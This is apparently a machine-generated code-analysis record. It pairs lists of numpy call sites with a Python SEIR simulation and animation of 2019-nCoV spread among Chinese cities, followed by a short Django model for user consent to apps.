deg=True)\n', (11279, 11295), True, 'import numpy as np\n'), ((11333, 11357), 'numpy.angle', 'np.angle', (['I_1n'], {'deg': '(True)'}), '(I_1n, deg=True)\n', (11341, 11357), True, 'import numpy as np\n'), ((11395, 11419), 'numpy.angle', 'np.angle', (['I_2a'], {'deg': '(True)'}), '(I_2a, deg=True)\n', (11403, 11419), True, 'import numpy as np\n'), ((11457, 11481), 'numpy.angle', 'np.angle', (['I_2b'], {'deg': '(True)'}), '(I_2b, deg=True)\n', (11465, 11481), True, 'import numpy as np\n'), ((11519, 11543), 'numpy.angle', 'np.angle', (['I_2c'], {'deg': '(True)'}), '(I_2c, deg=True)\n', (11527, 11543), True, 'import numpy as np\n'), ((11581, 11605), 'numpy.angle', 'np.angle', (['I_2n'], {'deg': '(True)'}), '(I_2n, deg=True)\n', (11589, 11605), True, 'import numpy as np\n'), ((12145, 12175), 'numpy.exp', 'np.exp', (['(2.0 / 3 * np.pi * 1.0j)'], {}), '(2.0 / 3 * np.pi * 1.0j)\n', (12151, 12175), True, 'import numpy as np\n'), ((15783, 15813), 'numpy.exp', 'np.exp', (['(2.0 / 3 * np.pi * 1.0j)'], {}), '(2.0 / 3 * np.pi * 1.0j)\n', (15789, 15813), True, 'import numpy as np\n'), ((18152, 18182), 'numpy.exp', 'np.exp', (['(2.0 / 3 * np.pi * 1.0j)'], {}), '(2.0 / 3 * np.pi * 1.0j)\n', (18158, 18182), True, 'import numpy as np\n'), ((23924, 23940), 'numpy.sqrt', 'np.sqrt', (['s_total'], {}), '(s_total)\n', (23931, 23940), True, 'import numpy as np\n'), ((35685, 35706), 'numpy.deg2rad', 'np.deg2rad', (['phases[0]'], {}), '(phases[0])\n', (35695, 35706), True, 'import numpy as np\n'), ((35744, 35765), 'numpy.deg2rad', 'np.deg2rad', (['phases[1]'], {}), '(phases[1])\n', (35754, 35765), True, 'import numpy as np\n'), ((35803, 35824), 'numpy.deg2rad', 'np.deg2rad', (['phases[2]'], {}), '(phases[2])\n', (35813, 35824), True, 'import numpy as np\n'), ((35872, 35890), 'numpy.deg2rad', 'np.deg2rad', (['phases'], {}), '(phases)\n', (35882, 35890), True, 'import numpy as np\n'), ((35928, 35952), 'numpy.deg2rad', 'np.deg2rad', (['(phases - 240)'], {}), '(phases - 240)\n', (35938, 35952), True, 'import numpy as np\n'), ((35988, 36012), 'numpy.deg2rad', 'np.deg2rad', (['(phases - 120)'], {}), '(phases - 120)\n', (35998, 36012), True, 'import numpy as np\n'), ((36895, 36905), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (36902, 36905), True, 'import numpy as np\n'), ((36906, 36934), 'numpy.exp', 'np.exp', (['(1.0j * omega * Times)'], {}), '(1.0j * omega * Times)\n', (36912, 36934), True, 'import numpy as np\n'), ((37370, 37380), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (37377, 37380), True, 'import numpy as np\n'), ((37381, 37409), 'numpy.exp', 'np.exp', (['(1.0j * omega * Times)'], {}), '(1.0j * omega * Times)\n', (37387, 37409), True, 'import numpy as np\n'), ((6399, 6411), 'numpy.abs', 'np.abs', (['v_ag'], {}), '(v_ag)\n', (6405, 6411), True, 'import numpy as np\n'), ((6448, 6460), 'numpy.abs', 'np.abs', (['v_bg'], {}), '(v_bg)\n', (6454, 6460), True, 'import numpy as np\n'), ((6497, 6509), 'numpy.abs', 'np.abs', (['v_cg'], {}), '(v_cg)\n', (6503, 6509), True, 'import numpy as np\n'), ((6589, 6613), 'numpy.angle', 'np.angle', (['v_ag'], {'deg': '(True)'}), '(v_ag, deg=True)\n', (6597, 6613), True, 'import numpy as np\n'), ((6652, 6676), 'numpy.angle', 'np.angle', (['v_bg'], {'deg': '(True)'}), '(v_bg, deg=True)\n', (6660, 6676), True, 'import numpy as np\n'), ((6715, 6739), 'numpy.angle', 'np.angle', (['v_cg'], {'deg': '(True)'}), '(v_cg, deg=True)\n', (6723, 6739), True, 'import numpy as np\n'), ((6778, 6799), 'numpy.angle', 'np.angle', (['(0)'], {'deg': '(True)'}), '(0, deg=True)\n', (6786, 6799), True, 'import numpy as np\n'), ((6837, 6856), 'numpy.abs', 'np.abs', (['(v_ag - v_bg)'], {}), '(v_ag - v_bg)\n', (6843, 6856), True, 'import numpy as np\n'), ((6891, 6910), 'numpy.abs', 'np.abs', (['(v_bg - v_cg)'], {}), '(v_bg - v_cg)\n', (6897, 6910), True, 'import numpy as np\n'), ((6945, 6964), 'numpy.abs', 'np.abs', (['(v_cg - v_ag)'], {}), '(v_cg - v_ag)\n', (6951, 6964), True, 'import numpy as np\n'), ((8133, 8145), 'numpy.abs', 'np.abs', (['v_an'], {}), '(v_an)\n', (8139, 8145), True, 'import numpy as np\n'), ((8182, 8194), 'numpy.abs', 'np.abs', (['v_bn'], {}), '(v_bn)\n', (8188, 8194), True, 'import numpy as np\n'), ((8231, 8243), 'numpy.abs', 'np.abs', (['v_cn'], {}), '(v_cn)\n', (8237, 8243), True, 'import numpy as np\n'), ((8280, 8292), 'numpy.abs', 'np.abs', (['v_ng'], {}), '(v_ng)\n', (8286, 8292), True, 'import numpy as np\n'), ((8332, 8363), 'numpy.angle', 'np.angle', (['(v_ag - v_ng)'], {'deg': '(True)'}), '(v_ag - v_ng, deg=True)\n', (8340, 8363), True, 'import numpy as np\n'), ((8400, 8431), 'numpy.angle', 'np.angle', (['(v_bg - v_ng)'], {'deg': '(True)'}), '(v_bg - v_ng, deg=True)\n', (8408, 8431), True, 'import numpy as np\n'), ((8468, 8499), 'numpy.angle', 'np.angle', (['(v_cg - v_ng)'], {'deg': '(True)'}), '(v_cg - v_ng, deg=True)\n', (8476, 8499), True, 'import numpy as np\n'), ((8536, 8560), 'numpy.angle', 'np.angle', (['v_ng'], {'deg': '(True)'}), '(v_ng, deg=True)\n', (8544, 8560), True, 'import numpy as np\n'), ((8598, 8617), 'numpy.abs', 'np.abs', (['(v_ag - v_bg)'], {}), '(v_ag - v_bg)\n', (8604, 8617), True, 'import numpy as np\n'), ((8652, 8671), 'numpy.abs', 'np.abs', (['(v_bg - v_cg)'], {}), '(v_bg - v_cg)\n', (8658, 8671), True, 'import numpy as np\n'), ((8706, 8725), 'numpy.abs', 'np.abs', (['(v_cg - v_ag)'], {}), '(v_cg - v_ag)\n', (8712, 8725), True, 'import numpy as np\n'), ((21722, 21743), 'numpy.abs', 'np.abs', (['(v_abc - v_avg)'], {}), '(v_abc - v_avg)\n', (21728, 21743), True, 'import numpy as np\n'), ((39005, 39018), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (39011, 39018), True, 'import numpy as np\n'), ((39020, 39053), 'numpy.cos', 'np.cos', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (39026, 39053), True, 'import numpy as np\n'), ((39049, 39082), 'numpy.cos', 'np.cos', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (39055, 39082), True, 'import numpy as np\n'), ((39391, 39404), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (39397, 39404), True, 'import numpy as np\n'), ((39406, 39439), 'numpy.cos', 'np.cos', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (39412, 39439), True, 'import numpy as np\n'), ((39435, 39468), 'numpy.cos', 'np.cos', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (39441, 39468), True, 'import numpy as np\n'), ((40550, 40563), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (40556, 40563), True, 'import numpy as np\n'), ((40565, 40598), 'numpy.cos', 'np.cos', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (40571, 40598), True, 'import numpy as np\n'), ((40594, 40627), 'numpy.cos', 'np.cos', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (40600, 40627), True, 'import numpy as np\n'), ((12457, 12468), 'numpy.abs', 'np.abs', (['I_a'], {}), '(I_a)\n', (12463, 12468), True, 'import numpy as np\n'), ((12514, 12525), 'numpy.abs', 'np.abs', (['I_b'], {}), '(I_b)\n', (12520, 12525), True, 'import numpy as np\n'), ((12571, 12582), 'numpy.abs', 'np.abs', (['I_c'], {}), '(I_c)\n', (12577, 12582), True, 'import numpy as np\n'), ((12628, 12639), 'numpy.abs', 'np.abs', (['I_n'], {}), '(I_n)\n', (12634, 12639), True, 'import numpy as np\n'), ((12685, 12708), 'numpy.angle', 'np.angle', (['I_a'], {'deg': '(True)'}), '(I_a, deg=True)\n', (12693, 12708), True, 'import numpy as np\n'), ((12754, 12777), 'numpy.angle', 'np.angle', (['I_b'], {'deg': '(True)'}), '(I_b, deg=True)\n', (12762, 12777), True, 'import numpy as np\n'), ((12823, 12846), 'numpy.angle', 'np.angle', (['I_c'], {'deg': '(True)'}), '(I_c, deg=True)\n', (12831, 12846), True, 'import numpy as np\n'), ((12892, 12915), 'numpy.angle', 'np.angle', (['I_n'], {'deg': '(True)'}), '(I_n, deg=True)\n', (12900, 12915), True, 'import numpy as np\n'), ((12961, 12972), 'numpy.abs', 'np.abs', (['I_a'], {}), '(I_a)\n', (12967, 12972), True, 'import numpy as np\n'), ((13018, 13029), 'numpy.abs', 'np.abs', (['I_b'], {}), '(I_b)\n', (13024, 13029), True, 'import numpy as np\n'), ((13075, 13086), 'numpy.abs', 'np.abs', (['I_c'], {}), '(I_c)\n', (13081, 13086), True, 'import numpy as np\n'), ((13132, 13143), 'numpy.abs', 'np.abs', (['I_n'], {}), '(I_n)\n', (13138, 13143), True, 'import numpy as np\n'), ((13189, 13212), 'numpy.angle', 'np.angle', (['I_a'], {'deg': '(True)'}), '(I_a, deg=True)\n', (13197, 13212), True, 'import numpy as np\n'), ((13258, 13281), 'numpy.angle', 'np.angle', (['I_b'], {'deg': '(True)'}), '(I_b, deg=True)\n', (13266, 13281), True, 'import numpy as np\n'), ((13327, 13350), 'numpy.angle', 'np.angle', (['I_c'], {'deg': '(True)'}), '(I_c, deg=True)\n', (13335, 13350), True, 'import numpy as np\n'), ((13396, 13419), 'numpy.angle', 'np.angle', (['I_n'], {'deg': '(True)'}), '(I_n, deg=True)\n', (13404, 13419), True, 'import numpy as np\n'), ((13461, 13472), 'numpy.abs', 'np.abs', (['i_z'], {}), '(i_z)\n', (13467, 13472), True, 'import numpy as np\n'), ((13514, 13525), 'numpy.abs', 'np.abs', (['i_p'], {}), '(i_p)\n', (13520, 13525), True, 'import numpy as np\n'), ((13567, 13578), 'numpy.abs', 'np.abs', (['i_n'], {}), '(i_n)\n', (13573, 13578), True, 'import numpy as np\n'), ((13935, 13946), 'numpy.abs', 'np.abs', (['I_a'], {}), '(I_a)\n', (13941, 13946), True, 'import numpy as np\n'), ((13992, 14003), 'numpy.abs', 'np.abs', (['I_b'], {}), '(I_b)\n', (13998, 14003), True, 'import numpy as np\n'), ((14049, 14060), 'numpy.abs', 'np.abs', (['I_c'], {}), '(I_c)\n', (14055, 14060), True, 'import numpy as np\n'), ((14106, 14117), 'numpy.abs', 'np.abs', (['I_n'], {}), '(I_n)\n', (14112, 14117), True, 'import numpy as np\n'), ((14163, 14186), 'numpy.angle', 'np.angle', (['I_a'], {'deg': '(True)'}), '(I_a, deg=True)\n', (14171, 14186), True, 'import numpy as np\n'), ((14232, 14255), 'numpy.angle', 'np.angle', (['I_b'], {'deg': '(True)'}), '(I_b, deg=True)\n', (14240, 14255), True, 'import numpy as np\n'), ((14301, 14324), 'numpy.angle', 'np.angle', (['I_c'], {'deg': '(True)'}), '(I_c, deg=True)\n', (14309, 14324), True, 'import numpy as np\n'), ((14370, 14393), 'numpy.angle', 'np.angle', (['I_n'], {'deg': '(True)'}), '(I_n, deg=True)\n', (14378, 14393), True, 'import numpy as np\n'), ((14439, 14450), 'numpy.abs', 'np.abs', (['I_a'], {}), '(I_a)\n', (14445, 14450), True, 'import numpy as np\n'), ((14496, 14507), 'numpy.abs', 'np.abs', (['I_b'], {}), '(I_b)\n', (14502, 14507), True, 'import numpy as np\n'), ((14553, 14564), 'numpy.abs', 'np.abs', (['I_c'], {}), '(I_c)\n', (14559, 14564), True, 'import numpy as np\n'), ((14610, 14621), 'numpy.abs', 'np.abs', (['I_n'], {}), '(I_n)\n', (14616, 14621), True, 'import numpy as np\n'), ((14667, 14690), 'numpy.angle', 'np.angle', (['I_a'], {'deg': '(True)'}), '(I_a, deg=True)\n', (14675, 14690), True, 'import numpy as np\n'), ((14736, 14759), 'numpy.angle', 'np.angle', (['I_b'], {'deg': '(True)'}), '(I_b, deg=True)\n', (14744, 14759), True, 'import numpy as np\n'), ((14805, 14828), 'numpy.angle', 'np.angle', (['I_c'], {'deg': '(True)'}), '(I_c, deg=True)\n', (14813, 14828), True, 'import numpy as np\n'), ((14874, 14897), 'numpy.angle', 'np.angle', (['I_n'], {'deg': '(True)'}), '(I_n, deg=True)\n', (14882, 14897), True, 'import numpy as np\n'), ((16115, 16128), 'numpy.abs', 'np.abs', (['I_j_a'], {}), '(I_j_a)\n', (16121, 16128), True, 'import numpy as np\n'), ((16174, 16187), 'numpy.abs', 'np.abs', (['I_j_b'], {}), '(I_j_b)\n', (16180, 16187), True, 'import numpy as np\n'), ((16233, 16246), 'numpy.abs', 'np.abs', (['I_j_c'], {}), '(I_j_c)\n', (16239, 16246), True, 'import numpy as np\n'), ((16292, 16305), 'numpy.abs', 'np.abs', (['I_j_n'], {}), '(I_j_n)\n', (16298, 16305), True, 'import numpy as np\n'), ((16351, 16376), 'numpy.angle', 'np.angle', (['I_j_a'], {'deg': '(True)'}), '(I_j_a, deg=True)\n', (16359, 16376), True, 'import numpy as np\n'), ((16422, 16447), 'numpy.angle', 'np.angle', (['I_j_b'], {'deg': '(True)'}), '(I_j_b, deg=True)\n', (16430, 16447), True, 'import numpy as np\n'), ((16493, 16518), 'numpy.angle', 'np.angle', (['I_j_c'], {'deg': '(True)'}), '(I_j_c, deg=True)\n', (16501, 16518), True, 'import numpy as np\n'), ((16564, 16589), 'numpy.angle', 'np.angle', (['I_j_n'], {'deg': '(True)'}), '(I_j_n, deg=True)\n', (16572, 16589), True, 'import numpy as np\n'), ((16635, 16648), 'numpy.abs', 'np.abs', (['I_k_a'], {}), '(I_k_a)\n', (16641, 16648), True, 'import numpy as np\n'), ((16694, 16707), 'numpy.abs', 'np.abs', (['I_k_b'], {}), '(I_k_b)\n', (16700, 16707), True, 'import numpy as np\n'), ((16753, 16766), 'numpy.abs', 'np.abs', (['I_k_c'], {}), '(I_k_c)\n', (16759, 16766), True, 'import numpy as np\n'), ((16812, 16825), 'numpy.abs', 'np.abs', (['I_k_n'], {}), '(I_k_n)\n', (16818, 16825), True, 'import numpy as np\n'), ((16871, 16896), 'numpy.angle', 'np.angle', (['I_k_a'], {'deg': '(True)'}), '(I_k_a, deg=True)\n', (16879, 16896), True, 'import numpy as np\n'), ((16942, 16967), 'numpy.angle', 'np.angle', (['I_k_b'], {'deg': '(True)'}), '(I_k_b, deg=True)\n', (16950, 16967), True, 'import numpy as np\n'), ((17013, 17038), 'numpy.angle', 'np.angle', (['I_k_c'], {'deg': '(True)'}), '(I_k_c, deg=True)\n', (17021, 17038), True, 'import numpy as np\n'), ((17084, 17109), 'numpy.angle', 'np.angle', (['I_k_n'], {'deg': '(True)'}), '(I_k_n, deg=True)\n', (17092, 17109), True, 'import numpy as np\n'), ((17151, 17162), 'numpy.abs', 'np.abs', (['i_z'], {}), '(i_z)\n', (17157, 17162), True, 'import numpy as np\n'), ((17204, 17215), 'numpy.abs', 'np.abs', (['i_p'], {}), '(i_p)\n', (17210, 17215), True, 'import numpy as np\n'), ((17257, 17268), 'numpy.abs', 'np.abs', (['i_n'], {}), '(i_n)\n', (17263, 17268), True, 'import numpy as np\n'), ((18484, 18497), 'numpy.abs', 'np.abs', (['I_j_a'], {}), '(I_j_a)\n', (18490, 18497), True, 'import numpy as np\n'), ((18543, 18556), 'numpy.abs', 'np.abs', (['I_j_b'], {}), '(I_j_b)\n', (18549, 18556), True, 'import numpy as np\n'), ((18602, 18615), 'numpy.abs', 'np.abs', (['I_j_c'], {}), '(I_j_c)\n', (18608, 18615), True, 'import numpy as np\n'), ((18661, 18674), 'numpy.abs', 'np.abs', (['I_j_n'], {}), '(I_j_n)\n', (18667, 18674), True, 'import numpy as np\n'), ((18720, 18745), 'numpy.angle', 'np.angle', (['I_j_a'], {'deg': '(True)'}), '(I_j_a, deg=True)\n', (18728, 18745), True, 'import numpy as np\n'), ((18791, 18816), 'numpy.angle', 'np.angle', (['I_j_b'], {'deg': '(True)'}), '(I_j_b, deg=True)\n', (18799, 18816), True, 'import numpy as np\n'), ((18862, 18887), 'numpy.angle', 'np.angle', (['I_j_c'], {'deg': '(True)'}), '(I_j_c, deg=True)\n', (18870, 18887), True, 'import numpy as np\n'), ((18933, 18958), 'numpy.angle', 'np.angle', (['I_j_n'], {'deg': '(True)'}), '(I_j_n, deg=True)\n', (18941, 18958), True, 'import numpy as np\n'), ((19004, 19017), 'numpy.abs', 'np.abs', (['I_k_a'], {}), '(I_k_a)\n', (19010, 19017), True, 'import numpy as np\n'), ((19063, 19076), 'numpy.abs', 'np.abs', (['I_k_b'], {}), '(I_k_b)\n', (19069, 19076), True, 'import numpy as np\n'), ((19122, 19135), 'numpy.abs', 'np.abs', (['I_k_c'], {}), '(I_k_c)\n', (19128, 19135), True, 'import numpy as np\n'), ((19181, 19194), 'numpy.abs', 'np.abs', (['I_k_n'], {}), '(I_k_n)\n', (19187, 19194), True, 'import numpy as np\n'), ((19240, 19265), 'numpy.angle', 'np.angle', (['I_k_a'], {'deg': '(True)'}), '(I_k_a, deg=True)\n', (19248, 19265), True, 'import numpy as np\n'), ((19311, 19336), 'numpy.angle', 'np.angle', (['I_k_b'], {'deg': '(True)'}), '(I_k_b, deg=True)\n', (19319, 19336), True, 'import numpy as np\n'), ((19382, 19407), 'numpy.angle', 'np.angle', (['I_k_c'], {'deg': '(True)'}), '(I_k_c, deg=True)\n', (19390, 19407), True, 'import numpy as np\n'), ((19453, 19478), 'numpy.angle', 'np.angle', (['I_k_n'], {'deg': '(True)'}), '(I_k_n, deg=True)\n', (19461, 19478), True, 'import numpy as np\n'), ((39113, 39126), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (39119, 39126), True, 'import numpy as np\n'), ((39128, 39161), 'numpy.sin', 'np.sin', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (39134, 39161), True, 'import numpy as np\n'), ((39157, 39190), 'numpy.sin', 'np.sin', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (39163, 39190), True, 'import numpy as np\n'), ((39499, 39512), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (39505, 39512), True, 'import numpy as np\n'), ((39514, 39547), 'numpy.sin', 'np.sin', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (39520, 39547), True, 'import numpy as np\n'), ((39543, 39576), 'numpy.sin', 'np.sin', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (39549, 39576), True, 'import numpy as np\n'), ((40658, 40671), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (40664, 40671), True, 'import numpy as np\n'), ((40673, 40706), 'numpy.sin', 'np.sin', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (40679, 40706), True, 'import numpy as np\n'), ((40702, 40735), 'numpy.sin', 'np.sin', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (40708, 40735), True, 'import numpy as np\n')]
from matplotlib import animation from simulate.citySEIR import dCitySEIR from simulate.migration import Lout,Lin,dSpread import pickle import json import numpy as np import matplotlib.pyplot as plt from pylab import mpl mpl.rcParams['font.sans-serif'] = ['PingFang SC'] # 指定默认字体 mpl.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题 def simulate(initSEIR,days,hparams): """ 模拟2019-nCoV在46个重要城市之间的传播 :param days: :param hparams: :return: """ ## params T = days #模拟天数 R0,Di,De,Da = hparams ## init with open("../data/cases.pickle",'rb') as f: cases = pickle.load(f) with open("../data/cityPopulation.json",encoding='utf-8') as f: population = json.load(f) numCities = len(population) citysSEIR = np.zeros((numCities,5,T)) for i,S in enumerate(population): citysSEIR[i,0,0] = population[S]*10000 citysSEIR[0,:,0] = initSEIR LSin,DLSin = np.array([Lin(i,0) for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float) LEin,DLEin = np.array([0 for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float) LI1in,DLI1in = np.array([0 for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float) LI2in,DLI2in = np.array([0 for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float) LRin,DLRin = np.array([0 for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float) for t in range(T-1): for i in range(numCities): Lo = Lout(i,t) # 第t天流出城市i的人数 Lsi,Lei,Li1i,Li2i,Lri= LSin[i],LEin[i],LI1in[i],LI2in[i],LRin[i] params = R0,Di,De,Da,Lsi,Lei,Li1i,Li2i,Lri,np.sum(Lo) initVector = citysSEIR[i,:,t] dF = dCitySEIR(initVector,t,params=(params)) citysSEIR[i,:,t+1] = citysSEIR[i,:,t] + dF DLSin += dSpread(Lo,initVector,i)[0] DLEin += dSpread(Lo,initVector,i)[1] DLI1in+= dSpread(Lo,initVector,i)[2] DLI2in+= dSpread(Lo,initVector,i)[3] DLRin += dSpread(Lo,initVector,i)[4] LSin,LEin,LI1in,LI2in,LRin = DLSin,DLEin,DLI1in,DLI2in,DLRin DLSin = np.zeros_like(DLSin) DLEin = np.zeros_like(DLEin) DLI1in = np.zeros_like(DLI1in) DLI2in = np.zeros_like(DLI2in) DLRin = np.zeros_like(DLRin) # print(t) return citysSEIR def visualize(citysSEIR): with open("../data/cityAndId.json",encoding='utf-8') as f: citys = json.load(f) citys = [i for i in citys] y_pos = np.arange(len(citys)) numcities,_,T = citysSEIR.shape fig, ax = plt.subplots(2,2,figsize=(30,20)) for i in range(2): for j in range(2): ax[i,j].set_yticks(y_pos) ax[i,j].set_yticklabels(citys) x = range(numcities) # S = ax[0, 0].barh(x, citysSEIR[:,0,T-1]) E = ax[0,0].barh(x,citysSEIR[:,1,T-1]) I1 = ax[0, 1].barh(x,citysSEIR[:,2,T-1]) I2 = ax[1, 0].barh(x,citysSEIR[:,3,T-1]) R = ax[1, 1].barh(x,citysSEIR[:,4,T-1]) # N = ax[1, 2].barh(x,np.sum(citysSEIR[:,:,T-1],axis=1)) SEIR = [E,I1,I2,R] def animate(i): # tex1 = ax[0, 0].set_title("S day{}".format(str(i + 1))) tex2 = ax[0, 0].set_title("E day{}".format(str(i + 1))) tex3 = ax[0, 1].set_title("I1 day{}".format(str(i + 1))) tex4 = ax[1, 0].set_title("I2 day{}".format(str(i + 1))) tex5 = ax[1, 1].set_title("R day{}".format(str(i + 1))) # tex6 = ax[1, 2].set_title("N day{}".format(str(i + 1))) for j,bar in enumerate(SEIR): if j ==5: y = np.sum(citysSEIR[:,:,i],axis=1) else: y = citysSEIR[:,j+1,i] for t, b in enumerate(bar): b.set_width(y[t]) anim = animation.FuncAnimation(fig, animate, repeat=True, blit=False, frames=T-1, interval=200) anim.save('mymovie.gif', writer='pillow') plt.show() if __name__ == "__main__": R0 = 2.2 Di = 5 De = 12 Da = 3 T = 30 initSEIR = [1108.1*10000,10,100,1,0] # 武汉的S,E,I1,I2,R citysSEIR = simulate(initSEIR,days=T,hparams=(R0,Di,De,Da)) visualize(citysSEIR)
[ "matplotlib.animation.FuncAnimation", "pickle.load", "simulate.migration.Lout", "numpy.sum", "numpy.zeros", "simulate.migration.Lin", "simulate.citySEIR.dCitySEIR", "json.load", "simulate.migration.dSpread", "numpy.zeros_like", "matplotlib.pyplot.subplots", "matplotlib.pyplot.show" ]
[((810, 837), 'numpy.zeros', 'np.zeros', (['(numCities, 5, T)'], {}), '((numCities, 5, T))\n', (818, 837), True, 'import numpy as np\n'), ((2787, 2823), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(2)'], {'figsize': '(30, 20)'}), '(2, 2, figsize=(30, 20))\n', (2799, 2823), True, 'import matplotlib.pyplot as plt\n'), ((3979, 4073), 'matplotlib.animation.FuncAnimation', 'animation.FuncAnimation', (['fig', 'animate'], {'repeat': '(True)', 'blit': '(False)', 'frames': '(T - 1)', 'interval': '(200)'}), '(fig, animate, repeat=True, blit=False, frames=T - 1,\n interval=200)\n', (4002, 4073), False, 'from matplotlib import animation\n'), ((4156, 4166), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4164, 4166), True, 'import matplotlib.pyplot as plt\n'), ((639, 653), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (650, 653), False, 'import pickle\n'), ((745, 757), 'json.load', 'json.load', (['f'], {}), '(f)\n', (754, 757), False, 'import json\n'), ((2326, 2346), 'numpy.zeros_like', 'np.zeros_like', (['DLSin'], {}), '(DLSin)\n', (2339, 2346), True, 'import numpy as np\n'), ((2364, 2384), 'numpy.zeros_like', 'np.zeros_like', (['DLEin'], {}), '(DLEin)\n', (2377, 2384), True, 'import numpy as np\n'), ((2403, 2424), 'numpy.zeros_like', 'np.zeros_like', (['DLI1in'], {}), '(DLI1in)\n', (2416, 2424), True, 'import numpy as np\n'), ((2443, 2464), 'numpy.zeros_like', 'np.zeros_like', (['DLI2in'], {}), '(DLI2in)\n', (2456, 2464), True, 'import numpy as np\n'), ((2482, 2502), 'numpy.zeros_like', 'np.zeros_like', (['DLRin'], {}), '(DLRin)\n', (2495, 2502), True, 'import numpy as np\n'), ((2655, 2667), 'json.load', 'json.load', (['f'], {}), '(f)\n', (2664, 2667), False, 'import json\n'), ((1663, 1673), 'simulate.migration.Lout', 'Lout', (['i', 't'], {}), '(i, t)\n', (1667, 1673), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((1893, 1932), 'simulate.citySEIR.dCitySEIR', 'dCitySEIR', (['initVector', 't'], {'params': 'params'}), '(initVector, t, params=params)\n', (1902, 1932), False, 'from simulate.citySEIR import dCitySEIR\n'), ((986, 995), 'simulate.migration.Lin', 'Lin', (['i', '(0)'], {}), '(i, 0)\n', (989, 995), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((1821, 1831), 'numpy.sum', 'np.sum', (['Lo'], {}), '(Lo)\n', (1827, 1831), True, 'import numpy as np\n'), ((2011, 2037), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2018, 2037), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((2061, 2087), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2068, 2087), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((2111, 2137), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2118, 2137), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((2161, 2187), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2168, 2187), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((2211, 2237), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2218, 2237), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((3798, 3832), 'numpy.sum', 'np.sum', (['citysSEIR[:, :, i]'], {'axis': '(1)'}), '(citysSEIR[:, :, i], axis=1)\n', (3804, 3832), True, 'import numpy as np\n')]
from django.conf import settings from django.db import models from django.utils.translation import ugettext_lazy as _ from .app import App class UserConsent(models.Model): class Meta: verbose_name = _("user consent") verbose_name_plural = _("user consents") unique_together = ('user', 'app') user = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("user")) app = models.ForeignKey(App, verbose_name=_("app")) _scope = models.TextField(default='', verbose_name=_("scopes")) date_given = models.DateTimeField(verbose_name=_("date given"), auto_now_add=True) date_updated = models.DateTimeField(verbose_name=_("date updated"), auto_now=True) @property def scope(self): return set(self._scope.split()) @scope.setter def scope(self, value): self._scope = ' '.join(value) def __str__(self): return '{0} - {1}'.format(self.app, self.user)
[ "django.utils.translation.ugettext_lazy" ]
[((205, 222), 'django.utils.translation.ugettext_lazy', '_', (['"""user consent"""'], {}), "('user consent')\n", (206, 222), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((247, 265), 'django.utils.translation.ugettext_lazy', '_', (['"""user consents"""'], {}), "('user consents')\n", (248, 265), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((368, 377), 'django.utils.translation.ugettext_lazy', '_', (['"""user"""'], {}), "('user')\n", (369, 377), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((422, 430), 'django.utils.translation.ugettext_lazy', '_', (['"""app"""'], {}), "('app')\n", (423, 430), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((484, 495), 'django.utils.translation.ugettext_lazy', '_', (['"""scopes"""'], {}), "('scopes')\n", (485, 495), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((546, 561), 'django.utils.translation.ugettext_lazy', '_', (['"""date given"""'], {}), "('date given')\n", (547, 561), True, 'from 